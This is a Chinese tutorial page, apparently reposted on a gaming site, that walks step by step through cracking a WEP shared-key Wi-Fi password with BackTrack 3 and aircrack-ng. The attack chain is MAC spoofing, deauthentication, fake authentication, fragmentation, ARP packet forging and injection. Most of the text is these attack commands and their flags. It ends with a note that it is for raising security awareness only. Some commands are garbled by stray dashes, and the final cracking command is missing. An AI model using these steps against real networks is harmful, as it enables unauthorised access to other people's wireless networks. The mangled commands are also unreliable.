您好,欢迎来到易妖游戏网。
搜索
您的当前位置:首页BT3下破解共享密钥认证的WEP密码

BT3下破解共享密钥认证的WEP密码

来源:易妖游戏网
BT3下破解共享密钥认证的WEP密码

当然先是制作中文版本(英文版的也可以)的可以启动BT3的U盘,这个论坛里很多人介绍怎么做了,在此就略过了。

然后要做的一步相当的重要,那就是卸载你用来攻击的无线网卡,并更改它的MAC为AP的无线客户端的MAC,一定是要合法无线客户端的MAC,要不然很难成功。我的网卡名为WIFI1,大家可以用命令先看下自己的网卡名。(因为我的笔记本内置的网卡也是ATHEROS芯片的,但是破解没有成功,所以改用ICOM 的SL-5200,此卡相当不错,支持a/b/g三频,而且支持到14频道,这个很难得。最后笔记本自带的网卡也成功破解了,证实是方法不当所致) 相应的命令为: ifconfig –a

ifconfig –a wifi1 down

macchanger –m 00:1a:73:c5:31:e0 wifi1

这个命令中攻击用无线网卡的MAC必须用冒号隔开,这个命令以后对MAC的操作就不需要再用冒号隔开了,直接输数字和字母就可以了(十六进制)。 其中需要注意的就是这个伪装的MAC必须与AP的无线客户端相同,要不然很难成功,至少我是这样的。

ifconfig –a wifi1 up(加载攻击用无线网卡) airmon-ng start wifi1 13

上面的13代表的是无线AP所工作的频道,2.4G WIFI用频率的最高频道为14频道。

图片中所示的“ath2”就是我们最后攻击所用的无线网卡的接口名。 准备工作完毕以后我们就可以开始了。 首先我们先开始收集ivs包。 相应的命令为:

airodump-ng – –ivs –w check – –bssid 00131004e526 –c 13 ath2 --ivs 表示只收集ivs包,

-w 后面表示收集ivs包所生成的文件名,但最后往往会在文件名后加上-01、-02等等,

--bssid 表示AP的MAC,这样做的好处就是只收集与这个MAC相对应的AP的ivs包,

-c 后面跟的AP的频道数。

这一步做完我们就可以开始正式的攻击了。

相应的攻击命令为:

aireplay-ng -0 1 –a 00131004e526 –c 001a73c5-31e0 ath2

-0 表示对无线客户端进行认证攻击,使无线客户端断线重连,以获得握手包。 1 表示攻击的次数,一般顺利的话1次就够了,不顺利的话攻击无数次都不成功,建议大家在纯的BT3下进行,VM下很难获得,我在VM做了N次,用WUSB54G V4只获得过一次握手包。 -a 后面跟的是AP的MAC,

-c 后面跟的所要攻击的无线客户端的MAC,记住这个参数一定是要-c,不能是-h哦。

攻击成功后会在airodump-ng的窗口的右上角出现捕获握手包的提示,它所保存的文件是以AP的MAC命名的XOR文件,注意与后面构建ARP包所必须的XOR文件相区别。

然后就是进行虚假认证攻击,相应的命令为:

aireplay-ng -1 0 –e LINKSYS –a 00131004e526 –y check-01-00-13-10-04-e5-26.xor ath2

-1 表示虚假认证攻击, 0 表示攻击延时, -e 表示AP的ESSID, -a 表示AP的MAC,

-y 表示捕获的握手包所生成的文件名。

看图中提示好像攻击只成功了一半,challenge是失败的,但是依然可以构建arp包,并成功进行注入攻击破解WEP密码。而且攻击会不断进行,我是用Ctrl+c来停止的。

然后就要开始进行-5攻击了,相应的命令为: Aireplay-ng -5 –b 00131004e526 –h 001a73c531e0 ath2 -5

-h 后面跟的是攻击用无线网卡伪装后的MAC。

出现“ Use this packet?”提示后输入“y”并回车。出现下面的画面就表示成功获得了构建arp包所必须的xor文件。

获得xor文件以后我们就可以构建arp包了,相应的命令为:

packetforge-ng -0 –a 00131004e526 –h 001a73c531e0 –k 255.255.255.255 –l 255.255.255.255 –y fragment-0215-195944.xor –w arp -0 -k

-l 是大写字母L的小写,不是1哦, -y 后面跟的是构建arp包所必须的xor文件, -w 后面跟的是构建的arp包所生成的文件名。

这一步以后我们就可以进行让DATA猛涨的注入式攻击了,相应的命令为: aireplay-ng -2 –r arp –x 1024 ath2 -2

-r 后面跟的是arp包文件名,

-x 定义所发送的攻击包的大小,最大为1024,默认为512,以大家可以稳定发送攻击包的大小为准,根据无线网卡的不同而不同。

出现“ Use this packet?”提示后输入“y”并回车,注入式攻击正式开始,我们可以看到airodump-ng窗口的DATA数字快速的增长,

大家可以看到一分钟的时间DATA数就从2万多增长到6万多了。

其实只要DATA数到大概5万的时候就可以开启实时破解了,相应的命令为:

最后说几句,大家输入命令的时候可以用键盘的“↑”“↓”来翻出以前输入过的命令,还有比如要反复输入的MAC可以用复制和粘贴来操作,这样可以方便许多。总之一句话,大家需要反复的实践才能获得你想要的知识,我就是在试了N次,试了N多的无线网卡才获得成功的,以前一直用的好好的的LINKSYS 的WUSB54G V4无线网卡居然死活不行,这个网卡可是WEP开放式、WPA、WPA2都成功破解过的啊,最后还是ICOM的笔记本网卡成功的。 实验过程中发现还是笔记本无线网卡来的好用,几乎不会出现攻击假死的情况,USB的经常碰到。

此文旨在交流经验以提高大家的无线安全意识,不得用于非法用途!

因篇幅问题不能全部显示,请点此查看更多更全内容

Copyright © 2019- vipyiyao.com 版权所有 湘ICP备2023022495号-8

违法及侵权请联系:TEL:199 18 7713 E-MAIL:2724546146@qq.com

本站由北京市万商天勤律师事务所王兴未律师提供法律服务